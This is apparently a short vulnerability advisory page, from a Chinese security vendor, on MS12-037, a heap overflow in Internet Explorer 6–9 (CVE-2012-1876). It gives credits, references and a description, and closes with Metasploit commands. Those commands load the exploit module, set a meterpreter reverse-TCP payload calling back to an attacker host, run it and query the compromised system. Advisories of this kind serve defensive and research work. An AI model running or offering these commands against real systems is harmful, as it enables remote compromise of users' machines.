- 销售热线:010-8234 9450
Microsoft IE insertRow远程代码执行漏洞 (MS12-037)
PoC provided by :
Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez
Reference(s) :
MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9
Tested on Windows XP Pro SP3 with :
Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP
Description :
This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.
Commands :
use exploit/windows/browser/ms12_037_ie_colspan set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid